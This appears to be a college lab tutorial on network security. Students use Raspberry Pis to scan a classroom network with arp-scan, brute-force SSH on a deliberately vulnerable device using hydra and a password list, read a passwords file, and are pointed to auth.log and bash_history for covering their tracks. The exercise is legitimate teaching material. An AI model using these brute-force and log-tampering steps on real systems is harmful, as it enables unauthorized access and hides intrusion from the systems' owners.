Last Updated: 2019-11-19

Fundamentals of network security

Download Slide deck

Throughout this class you will develop:

Your understanding of how networks are assembled and work.

Your understanding of:

Connecting the Raspberry Pi

Download Slide deck

See the image below for instructions on how to connect the Pi. When booted, the Pi should automatically connect to the local network.

Your Pi is loaded with a version of Raspbian called Raspbian Lite. There is no desktop interface loaded with this distribution so you will need to use the command line during this class. You do not need to connect a mouse.

Some useful commands

You have certain tools available which are pre-loaded on the Pi. These are:

nano #a simple text editor
cat #a way of displaying text files in a terminal
sudo #a tool for getting admin rights
arp-scan #a tool for scanning a network for IP addresses
ssh #a method for remotely connecting to another machine
hydra #a tool for trying lots of login passwords from a list

Some example usage of these commands is demonstrated below:

nano - A simple text editor

pi@raspberrypi ~ $ nano list.txt

This will bring up a list of passwords that you can edit. The correct password is in this list for this class. Press Ctrl+x to exit

cat - A way of displaying text files in a terminal

pi@raspberrypi ~ $ cat list.txt

This will print the contents of the text file to the terminal.

arp-scan - A tool for scanning a network for IP addresses

pi@raspberrypi ~ $ sudo arp-scan --interface=wlan0 --localnet

This will scan the Wi-Fi (this is specified by the wlan0 flag) network that the Pi is connected to and print all devices currently connected to that network.

ssh - A method for remotely connecting to another machine

pi@raspberrypi ~ $ ssh pi@192.168.0.129

This will establish a remote connection to the pi located at the IP address 192.168.0.129. It will ask for a password. This is the main user password for the Pi. The default is raspberry.

hydra - A tool for trying lots of login passwords from a list

pi@raspberrypi ~ $ hydra -l pi -P list.txt 192.168.0.129 -t 4 ssh

This will attempt to connect to the pi at IP address 192.168.0.129 using the passwords in the file list.txt. You can find the explanation of the rest of the command in the hydra man pages.

Note:

IP addresses

Download Slide deck

It is a good idea to first establish your own IP address. Run this command in the terminal:

pi@raspberrypi ~ $ ifconfig

Under this command, you should see some numbers 192.168.0.??? which corresponds to your IP address. Make a note of this.

Run this command to scan the network for other attached devices.

pi@raspberrypi ~ $ sudo arp-scan --interface=wlan0 --localnet

You should see the other Pis in the class, the router (which will always have the IP address 192.168.0.1) and another device. This is the vulnerable device.

The hydra command

Download Slide deck

Run this command in the terminal:

pi@raspberrypi ~ $ ssh pi@192.168.0.???

replacing the question marks with the IP address of a device on the network which you discovered in the previous step.

If you see a response that the connection was refused, try a different number.

Once you have attempted to enter the password, run the following command

pi@raspberrypi ~ $ hydra -l pi -P list.txt 192.168.0.?? -t 4 ssh

where the question marks are the IP address of the vulnerable device.

If this connects, you now have full control of this machine. Try the following command:

pi@raspberrypi ~ $ ls

This should list the contents of the directory. If this has all been completed correctly, you should see a passwords.txt file in the directory.

If you run the command:

pi@raspberrypi ~ $ cat passwords.txt

you should see the password to enter into the Form here: https://forms.gle/82UVt25cr7Hzx5QEA

Log files

Download Slide deck

The two to look at are

/var/log/auth.log & ~/.bash_history

This tutorial will not cover the rest of covering your tracks. Find out how to do this online... Good luck!

Congratulations, you have reached the end of the tutorial. Good luck!

If you have any questions, please contact Scott Morgan | smorgan@bridgend.ac.uk.

Download Slide deck

Next steps:

If you're interested in this, you should learn:

See more info in the Slide deck.

Resources & Further Reading: